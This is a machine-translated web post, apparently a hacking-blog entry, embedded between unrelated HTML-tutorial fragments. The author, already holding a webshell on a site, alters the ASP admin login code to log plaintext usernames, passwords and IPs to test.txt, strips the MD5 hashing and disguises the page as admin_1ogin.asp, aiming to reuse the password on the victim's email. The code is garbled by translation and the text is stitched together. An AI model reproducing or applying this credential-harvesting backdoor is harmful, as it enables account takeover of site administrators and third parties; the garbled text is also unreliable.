Рекомендуется: коллекция написания кодов HTML HTML - это язык наценки гипертекста (HypertextMarkuplanguage), также известный как веб -язык, необходим для понимания его на веб -страницах. Хотя сейчас есть много инструментов для создания веб -страниц, таких как DreamWvear, FrontPage и т. Д., Вы можете сделать красивые веб -страницы, не понимая эти коды. Полем Полем Поскольку контент HTML много, мало кто готов писать код для создания веб -страниц (эффективность INE), и большинство из них используют
В проверке безопасности я на самом деле получил Webshell, но мне также нужно, чтобы у социального работника была другая информация в его адресе электронной почты, поэтому я должен знать его привычки.
База данных была загружена, но пароль MD5 не мог быть расшифрован. Увы, кажется, что вам просто нужно записать пароль его учетной записи администратора входа в систему!
Сохраните неприятности от избавления от проблемы!
Этот пароль на самом деле важен, но не важен.
Потому что многие люди любят использовать один и тот же пароль. Даже детекторы безопасности, такие как я, неизбежно являются привычкой использовать тот же пароль учетной записи.
Сначала проверьте его код входа в систему
<%
Dim Login
Установите Login = новый Adlogin
Login.execute
Класс Адлогин
Частные отравнения
Private sub class_initialize
Установить CommCls = new CommonCls
Excommcls.isipallow
Excommcls.checkinstall
EceCommcls.getConfigCache (*)
Конец суб
Приватный sub class_terminate
Установить Ececommcls = ничего
Конец суб
Общественная подзадача
Смутное действие
Action = запрос (действие)
Выберите действие корпуса
Case Checklogin
Checklogin
Case Wurnount
Вход
Случай еще
Логинф
Конец выбора
Конец суб
Приватный подрегистратор
Dim AdName, ADPWD, CHECKCODE
Adname = ececommcls.g (trim (request (adname)))))
Adpwd = md5 (trim (request (adpwd)))))
CheckCode = EceCommcls.g (request (fectcode))
Если TRIM (CHECTCODE) <> SESSION (ExcheckCode) и Application (SN & ISCHECKCODE) = Да, тогда
Excommcls.showmsg Verification Code неверен! , Application (sn & blogurl) и admin_login.asp
Выход Sub
Конец, если
If trim (adname) = cstr (application (sn & adname)) и trim (adpwd) = cstr (application (sn & adpwd)) тогда
Response.cookies (md5 (sn)) (adname) = adname
Response.cookies (md5 (sn)) (adpwd) = adpwd
сеанс (adlogin) = md5 (sn)
EceCommcls.getConfigCache (*)
EceCommcls.getClassCache ()
Response.redirect (Application (SN & BlogURL) и ADMIN_INDEX.ASP)
Еще
EceCommcls.showmsg учетная запись или пароль ошибочны, Application (SN & Blogurl) и Admin_login.asp
Конец, если
Конец суб
Частный подраздел
Response.cookies (md5 (sn)) (adname) =
Response.cookies (md5 (sn)) (adpwd) =
session.abandon ()
EceCommcls.showmsg успешно вышел из строя, приложение (SN & Blogurl) и Index.asp
Конец суб
Частный суб в лог
%>
Посмотрите на следующий код
Adname = ececommcls.g (trim (request (adname)))))
Adpwd = md5 (trim (request (adpwd)))))
--- Значение очень простое, поэтому я не объясняю это явно здесь. В основном это зависит от MD5. Если пароль зашифрован с использованием MD5, записанный нами пароль будет бесполезным, и это все еще MD5. так
Поэтому я подумал о методе рыбалки. Его исходный интерфейс входа в систему
Приватный подрегистратор
Dim AdName, ADPWD, CHECTCODE, StrlogText, IP, FF
Adname = ececommcls.g (trim (request (adname)))))
Adpwd = (trim (request (adpwd))))
CheckCode = EceCommcls.g (request (fectcode))
strlogfile = test.txt
IP = запрос (IP)
Strlogtext = strlogtext & adname & ---- & adpwd & ----- ip: & ip & (remote_host)
Установить f = server.createObject (scripting.filesystemobject)
Установить ff = f.opentextfile (server.mapath (.) &/& strlogfile, 8, true, 0)
ff.writeline (chr (13)+chr (10) и strlogtext)
ff.close
Установите ff = ничего
Установите F = ничего
Если TRIM (CHECTCODE) <> SESSION (ExcheckCode) и Application (SN & ISCHECKCODE) = Да, тогда
Excommcls.showmsg Verification Code неверен! , Application (SN & BlogURL) и Admin_1ogin.asp
Выход Sub
Конец, если
If trim (adname) = cstr (application (sn & adname)) и trim (adpwd) = cstr (application (sn & adpwd)) тогда
Response.cookies (md5 (sn)) (adname) = adname
Response.cookies ((sn)) (adpwd) = adpwd
сеанс (adlogin) = md5 (sn)
EceCommcls.getConfigCache (*)
EceCommcls.getClassCache ()
Response.redirect (Application (SN & BlogUrl) и Admin_1ogin.asp)
Еще
EceCommcls.showmsg учетная запись или пароль ошибочны, приложение (SN & Blogurl) и Admin_1ogin.asp
Конец, если
Конец суб
Смотрите или нет,
a = исходная страница входа в систему теперь была заменена на фишинговую страницу
b = исходная страница входа в систему (admin_login.asp) модифицируется на Admin_1ogin.asp
Почему?
Оригинал: adpwd = md5 (trim (request (adpwd))))))
Response.cookies (md5 (sn)) (adpwd) = adpwd
Исправлять
Adpwd = (trim (request (adpwd))))
Response.cookies ((sn)) (adpwd) = adpwd
Удалить MD5. Полем Этот запутанный метод использовался в течение длительного времени! Полем Полем
Нет технического контента. Пожалуйста, не смейтесь надо мной! Пароль будет записан на test.txt
Поделиться: основные моменты головных элементов Документы HTML состоят из двух частей: голова (тематическая часть, обычно невидимая) и тела (часть тела, видимая в браузере). С популярностью визуальных веб -редакторов, таких как FrontPage и DreamWeaver (DW), это больше не мечта создавать профессиональную веб -страницу без понимания HTML. Однако эти инструменты создания домашней страницы не могут быть использованы